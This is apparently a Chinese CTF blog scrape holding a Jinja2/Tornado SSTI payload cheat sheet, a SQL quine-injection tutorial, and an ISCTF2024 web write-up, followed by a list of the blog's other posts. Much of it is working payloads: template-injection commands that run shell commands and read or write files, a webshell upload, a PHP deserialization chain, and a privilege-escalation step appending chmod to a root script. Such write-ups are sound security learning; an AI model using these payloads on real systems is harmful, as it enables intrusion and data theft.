{{"".__class__.__bases__.__subclasses__()[75].__init__.__globals__.__import__('os').popen('whoami').read()}}

利用linecache类所属空间下可用的os模块进行RCE的payload

{{"".__class__.__bases__.__subclasses__()[250].__init__.__globals__['os'].popen('whoami').read()}}

利用file类（仅python2可用）进行文件读入

{{[].__class__.__base__.__subclasses__()[40]('etc/passwd').read()}}

通用getshell，都是通过__builtins__调用eval进行代码执行

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__import__']('os').popen('ls').read()}} {% endif %}{% endfor %}

读写文件，通过__builtins__调用open进行文件读写

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('var/www/html/a.php', 'r').write("") }}{% endif %}{% endfor %}

#jinja2模板的特征

有一个config环境配置变量
通过config向上得到os进行ssti

{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}

#tornado模板的特征

存在handler，即当前的RequestHandler对象,也是tornado中HTTP请求处理的基类，利用这个基类也可以结合py本身的特质进行注入
handler的一些属性与方法

{{handler.get_argument('yu')}}   #比如传入?yu=123则返回值为123{{handler.cookies}}  #返回cookie值{{handler.get_cookie("data")}}  #返回cookie中data的值{{handler.decode_argument('\u0066')}}  #返回f，其中\u0066为f的unicode编码{{handler.get_query_argument('yu')}}  #比如传入?yu=123则返回值为123{{handler.settings}}  #比如传入application.settings中的值#handler.setting可以优先考虑查看。

存在request对象，以下是其常用属性

{{request.method}}  //返回请求方法名  GET|POST|PUT...{{request.query}}  //传入?a=123 则返回a=123{{request.arguments}}   //返回所有参数组成的字典{{request.cookies}}   //同{{handler.cookies}}

一些过滤的绕过

{{eval(handler.get_argument(request.method))}}#传入GET=__import__("os").popen("ls").read(), 绕过对引号的过滤

#过滤器

attr
用于获取变量：

""|attr("__class__")# 相当于"".__class__

format
格式化字符串：

"%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95)""["%c%c%c%c%c%c%c%c%c"|format(95,95,99,108,97,115,115,95,95)]# __class__

first last random
取第一个/最后一个/随机一个对象

"".__class__.__mro__|last()#  CFV )相当于"".__class__.__mro__[-1]

参考~🥰:
Python SSTI漏洞学习总结
tornado模板注入

Quine注入

2024-11-26T04:44:38.000Z

#什么是quine注入?

quine是一种计算机程序，它不接受输入并产生自己源代码的副本作为唯一的输出.
在ctf应用中，Quine注入的目的就是使得输入输出一致，绕过限制登录。这样说大概还是不够具体，让我们看一道例题吧。

#[第五空间 2021]yet_another_mysql_injection

以下是源码:

alert('{$mes}');location.href='{$url}';");}function checkSql($s) {  if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){    alertMes('hacker', 'index.php');  }}if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {  $username=$_POST['username'];  $password=$_POST['password'];  if ($username !== 'admin') {    alertMes('only admin can login', 'index.php');  }  checkSql($password);  $sql="SELECT password FROM users WHERE username='admin' and password='$password';";  $user_result=mysqli_query($con,$sql);  $row = mysqli_fetch_array($user_result);  if (!$row) {    alertMes("something wrong",'index.php');  }  if ($row['password'] === $password) {    die($FLAG);  } else {    alertMes("wrong password",'index.php');  }}if(isset($_GET['source'])){  show_source(__FILE__);  die;}  ?>

关键在于if ($row[‘password’] === $password) ,也就是说，我们查询出来的结果要和我们输入的密码强一致才能登录成功。也就是要用到quine这个“自己生自己”的技巧了。在做这题之前，我们要先搞清楚sql_quine注入的构造过程。

#构造quine

最基础的基本语句:select replace(“.”,char(46),”.”);,作用就是把”.”中的.换成.(非常像废话，但这就是核心思路了)
接下来看这个语句:

select replace('replace(".",char(46),".")',char(46),'replace(".",char(46),".")'); #查询语句replace("replace(".",char(46),".")",char(46),"replace(".",char(46),".")"); #输出语句

真神奇啊，查询语句和输出基本是完全一致的。但有问题，那就是引号仍然存在不同，原本的单引号成为了双引号(本来字符串中包含.的是双引号，所以会出现这样的情况)，然而我们不能把原来的单引号改成双引号来避免，
因为replace(“.”,char(46),”.”)字符串中有双引号，所以把它当作字符串写入replace时要用单引号，不然会报错。
所以要想办法把’变成”，同时又要保持输入输出相等，那么再用一次replace不久好了?于是就构造出了以下的语句:

replace(".",char(34),char(39)) #首先是最好想的，把"变成'，输出的是 .replace(replace(".",char(34),char(39)),char(46),".") #实现自我替换，输出的仍然是 .replace('replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)); #将之前的语句作为字符串，改变其中的引号，成功达成了将引号变换replace(replace('.',char(34),char(39)),char(46),'.')

实现了引号的替换,就再套一次之前的quine语句就好哩

select replace(replace('select replace(replace(".",char(34),char(39)),char(46),".")',char(34),char(39)),char(46),'select replace(replace(".",char(34),char(39)),char(46),".")');

这就是sql quine的语句了,真的很神奇呢。

#回到例题

再看例题，利用我们得出的模板，改为注入的样式即可

1" union select replace(replace(".",char(34),char(39)),char(46),".")# /*这个是基本的语句，参考 replace(replace(".",char(34),char(39)),char(46),".")*/replace('1" union select replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39))/*这样就解决了引号不一致的问题*/1' union select replace(replace('1" union select replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1" union select replace(replace(".",char(34),char(39)),char(46),".")#')#/*这个语句的返回值就和它本身是一模一样的了，也就是所谓的输入输出一致*//*这里还要注意以下基本语句的1"的这个双引号，因为这里用单引号的话会有配对问题，所以设为双引号，利用之后的replace来使之变为单引号，不会引起匹配问题。*/

最终pl:

username=admin&password=1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#

#总结

尽管quine注入的适用范围似乎并不太大，但确实很有意思，也可能可以用来解决一些密码比较问题，也比盲注方便不少。
多一门手艺总是好的🤗

参考~🥰:
SQL注入之Quine注入
Quine注入

WP FOR ISCTF2024 Web

2024-11-18T06:05:05.000Z

#wp for isctf2024

#1.25时晓山瑞希生日会

签到题，考察http请求头相关知识，首先修改user-agent为Project Sekai，再修改X-Forwarded-For为127.0.0.1，最后设置时间为Date: Sun, 27 Aug 2024 05:00:00 GMT。

#2.小蓝鲨的冒险

签到题，考察php各种特性。先利用@parse_str($b);语句，传入b=a[0]=MMHUWUV满足第一个条件。再post将num设为03750(8进制2024)。最后设定which为flag即可。

#3.ezssti

PYssti,对于我来说算是新题。这里直接给出payload

user_input={{''|attr(request.values.name1)|attr(request.values.name2)|attr(request.values.name3)()|attr(request.values.name4)(137)|attr (request.values.name5)|attr(request.values.name6)|attr(request.values.name7)('popen')(request.values.rce)|attr(request.values.name8)()}}&name1=__class__&name2=__base__&name3=__subclasses__&name4=pop&name5=__init__&name6=__globals__&name7=get&rce=cat /flag&name8=read

利用|attr(request.values.namex)的形式绕过_和[]的过滤，利用__class__.__base__来获取字符串类的基类，再用__subclasses__来获取其子类，在里边找到可以利用的类，这里是os._wrap_close类，用pop给他弹出来(拿到)，然后得到他的globals属性用popen执行rce，再read出来。

#4.UP!UPloader！

文件包含题，上传一个马来rce就行。难点(当然，对于我而言😴)在于想到通过include.php中包含文件的机制，通过phpfilter伪协议来获取其他php的源码，只要获得源码，就能知晓其文件上传的。拿到shell之后还要点经验，因为flag不是存在文件里的，而是存在环境里的，要用env命令调出来。
两个考点:

灵活运用各种伪代码，不能太套路化
找不到东西？上环境看看吧。(有时候robots.txt也是个不错的选择)

经验丰富的重要性就体现出来了,所以要多多做题呀。

#5.1z_php

rce题(说真的，几乎每题都是rce了)。源码给了，过滤了[‘cat’, ‘tac’, ‘head’, ‘nl’, ‘more’, ‘less’, ‘tail’, ‘vi’, ‘sed’, ‘od’]这些个命令。只要J=echo ‘‘ > a.php就可以打一个马进去，然后就好办了。

不过也可以用其他一些读文件的命令，详细参考这里.
其实这样更快呢，可能rce题做的多了，就一直rce了…

#6.ezserialize

没难度的反序列化(反序列化算是基础题了吧😋),直接给pl罢。

O:4:"User":2:{s:8:"username";s:3:"tre";s:7:"isAdmin";b:1;}

#7.ezrce

rce题。可惜的是刚刚我去尝试复现，结果发现啥命令都没回显了(各种wp都试了试，大概是环境已经关闭了🥲)。这里给出我印象里的pl:

cmd=(sy.(st).em)(hex2bin("636174202f666c6167")) //这里的hex是“cat /flag”

利用.连接system，用hex2bin函数来绕过各种过滤。其实这么一想，不如把system也扔到hex2bin里更好。

hex2bin真的超级好用啊，只要这个函数没有被过滤，基本上就是啥都能用🤗

#8.小蓝鲨的秘密

不好定性的题目，我觉得更像misc了(~~缘分到了自然而然就出了~~)。进靶机，结果直接到了小蓝鲨科技的官网去了，那大概是重定向了，现在得把靶机本身的url扒出来。在竞赛平台f12，检查元素获得url，拿burp抓个包，repeater给服务器发请求，响应包里就是flag。
感觉比起其他很多题，这题技术含量真的不大，但是过的人没有那么多，感觉明年hgame-mini也可以出这么一道,至少很有趣呀。

也是拿了个二血，开心开心~🤗

#9.天命人

反序列化题。本来还算常规的一道题，因为中文的缘故卡了好久(真正原因不太明了，大概是编码的问题，这题报错又没回显)
以下是源码：

";    public $zhi;    public $shan;    function __get($j)    {        echo "此地阴阳二气略显虚浮，加上刚刚带入的阳气，或可借此遁逃！
";        $yin="s214587387a";        $yang=$_GET['J'];        if (md5($yin)==$yang&&md5($yin)==md5($yang)){            echo "哦？又一个不信天命之人？行了，拿了东西速速离开吧
";            system('cat /flag');        }    }}class Huoyanjinjing{    public $huoyan;    public $jinjing;    function __get($huo)    {        $this->huoyan="火眼能洞察一切邪祟！
";        echo $this->huoyan->jinjing;    }    function __invoke()    {        $this->jinjing="金睛能看破世间迷惘！
";        echo $this->huoyan->jinjing;    }}class Dinghaishenzhen{    public $Jindou="一个筋斗能翻十万八千里！
";    public $yun;    function __toString()    {        $f=$this->yun;        $f();        return "你真的逃出去了吗？天命人？
";    }}class Jingdouyun{    public $Qishier=72;    public $bian="看俺老孙七十二变！
";    function __sleep()    {        echo "三更敲门，菩提老祖送我筋斗云...
";        echo new Jindouyun();    }}class Tianmingren {    public $tianming;    public $ren;    function __destruct()    {        echo "迷途中的羔羊，你相信天命吗？
";        echo $this->tianming;    }}$data = unserialize($_POST['Wukong']);throw new Exception('开局一根棍，装备全靠打。');?>

以下是exp：

";        $yin="s214587387a";        $yang=$_GET['J']; //0e215962017        if (md5($yin)==$yang&&md5($yin)==md5($yang)){            echo "哦？又一个不信天命之人？行了，拿了东西速速离开吧
";            system('cat /flag');        }    }}class Huoyanjinjing{    public $huoyan;    public $jinjing;    function __get($huo)     {        $this->huoyan="火眼能洞察一切邪祟！
";        echo $this->huoyan->jinjing;    }    function __invoke()    {        $this->jinjing="金睛能看破世间迷惘！
";        echo $this->huoyan->jinjing;            //触发wuzhishan    }}class Dinghaishenzhen{    public $Jindou;    public $yun;    function __toString()    {        $f=$this->yun;        $f();                 // 可以触发huoyanjinjing        return "你真的逃出去了吗？天命人？
";    }}class Jingdouyun{    public $Qishier=72;    public $bian="看俺老孙七十二变！
";    function __sleep()    {        echo "三更敲门，菩提老祖送我筋斗云...
";        echo new Jindouyun();    }}class Tianmingren {    public $tianming;    public $ren;    function __destruct()    {        echo '迷途中的羔羊，你相信天命吗？
';        echo $this->tianming;    }}$a = New Tianmingren();$b = new Wuzhishan();$c = new Huoyanjinjing();$d = new Dinghaishenzhen();$a->ren = $d;$a->tianming = $a->ren;$d->yun = $c;$c->huoyan = $b;echo urlencode(serialize($a));?>

注意要把源码里的中文字符串赋值语句删掉，否则会卡在第一个链节。

以下是pl：

O%3A11%3A%22Tianmingren%22%3A2%3A%7Bs%3A8%3A%22tianming%22%3BO%3A15%3A%22Dinghaishenzhen%22%3A2%3A%7Bs%3A6%3A%22Jindou%22%3BN%3Bs%3A3%3A%22yun%22%3BO%3A13%3A%22Huoyanjinjing%22%3A2%3A%7Bs%3A6%3A%22huoyan%22%3BO%3A9%3A%22Wuzhishan%22%3A3%3A%7Bs%3A2%3A%22wu%22%3BN%3Bs%3A3%3A%22zhi%22%3BN%3Bs%3A4%3A%22shan%22%3BN%3B%7Ds%3A7%3A%22jinjing%22%3BN%3B%7D%7Ds%3A3%3A%22ren%22%3Br%3A2%3B%7D

#10.小蓝鲨的临时存储室

rce题，于我而言也是认识linux很多东西的好题一道。打个马很容易，但是进了靶机文件目录，准备cat flag的时候才发现不成，一看权限，只有root可读可改，那其实这题给我误导到提权好久，感谢mufeng05大佬的指导，才知道没那么麻烦🫡
最主要是要意识到这个定时发生的sh（所以web手要对一些动态的反应敏感些呢），它会定时删去我们上传的php文件，所以我们把马打进去运行shell的时候，经常会出现404，这就是这个.sh文件搞的鬼。当然，我们也可以利用它。它就在根目录里:

#!/bin/bash find /var/www/localhost/htdocs/uploads/ -type f -name "*.php" -exec rm -f {} \;

执行ls -l /down_file.sh,发现我们对他是有修改权限的。从内容看到它是使用bin/bash的，具有root权限，那么我们就可以追加修改/flag的权限了.
最后的pl如下:

x=echo "chmod 777 /flag;" >>/down_file.sh

然后就畅通无阻啦~

#11.千年樱

php综合题(是我这次做的题里感觉含金量比较高的了)。首先是cookie伪造，比较常规.
源码:

";if($_COOKIE['from'] === "ISCTF"){    echo $dir1;}else{    die('what? so where are you from?');}// ?>

只要令cookie:from=ISCTF就可以，得到下一个问题的php:

    read! read! read!

这里要一个ISCTF，却是要由file_get_contents获取，那么第一时间就会想到用伪协议搞点事情，刚好data伪协议可以做到造一个字符串出来，那么这里的pl就是这样的了:

name=data://text/plain,ISCTF

来到最后一个问题，源码如下:

    read! read! read! we need read!!!

这下好了，我们的输入只能限制于php filter协议里的过滤器了。这个时候就要用到神奇的phpfilter链哩~

这个神奇的链子的知识准备在另一篇笔记里写，这里就带过啦

我们可以用神奇的php_filter_chain_generator工具构造filter链:

python php_filter_chain_generator.py --chain sakura for ISCTF

特别注意这个string.strip_tags,它可以删去字符串中html和php标签，也就是说，我们只要在生成的链子末尾加上这个过滤器，就可以把后边的冗余全部删去，得到的字符串就非常纯净了。

这里要感谢mysid佬和mufeng05佬~

`#最后的一点点想法`

ISCTF只有一周的时间，但确实是学到了很多东西啊，ctf果然是得积累好多经验，知识面也是广的离谱，总之之后的路大概还挺长的。但它真的会上瘾啊！ctf，嘿嘿，我的ctf，我的web，斯哈斯哈🤪

Tremseの部屋

计网读书笔记

#计网自顶向下读书笔记

#计算机网络和因特网

#网络核心

#分组交换

#电路交换

#分组交换网中的时延，丢包和吞吐量

#分组交换网中的时延概述

#排队时延和丢包

#计算机网络中的吞吐量

#协议层次及其服务模型

#分层的体系结构

#封装

#面对攻击的网络

#应用层

#网络应用原理

#网络应用体系

#进程通信

#可供应用程序使用的运输服务

#因特网提供的运输服务

#应用层协议

#Web和HTTP

#HTTP概述

#非持续连接和持续链接

#HTTP 报文格式

#用户与服务器的交互: Cookie

#Web缓存

#HTTP/2

#因特网中的电子邮件

#SMTP

#邮件报文格式

#邮件访问协议

#DNS：因特网的目录服务

#DNS提供的服务

#DNS工作机理概述

#DNS记录和报文

#P2P文件分发

#视频流和内容分发网

#因特网视频

#HTTP流和DASH

#内容分发网

#SSL/TLS

#什么是SSL

#SSL协议组成

#什么是TLS

#TLS协议的架构

#TLS握手流程

#主密码和预备主密码

#TLS记录协议

Python沙箱逃逸

#python沙箱逃逸

#生成器栈帧逃逸

#生成器

#栈帧

#生成器属性

#利用生成器栈帧沙箱逃逸

#Pyjail(MiniL 2025)

#异常栈帧逃逸

#什么是回溯对象

#利用手法

#Pybox(MiniL 2025)

赛题复现

#ez_dash_revenge(NCTF 2025)

#excellent-site(ACTF 2025)

Newest Advice(from myself)

#MiniForensicsⅡ(MiniL 2025)

docker的基础使用

#什么是Linux容器

#Docker概述

#Docker的用途

#image文件(镜像)

#容器文件

#Dockerfile文件

#Dockerfile的编写

#.dockerignore文件

#Dockerfile的基本结构

#Dockerfile文件

#常见的指令

bottle框架的一些特性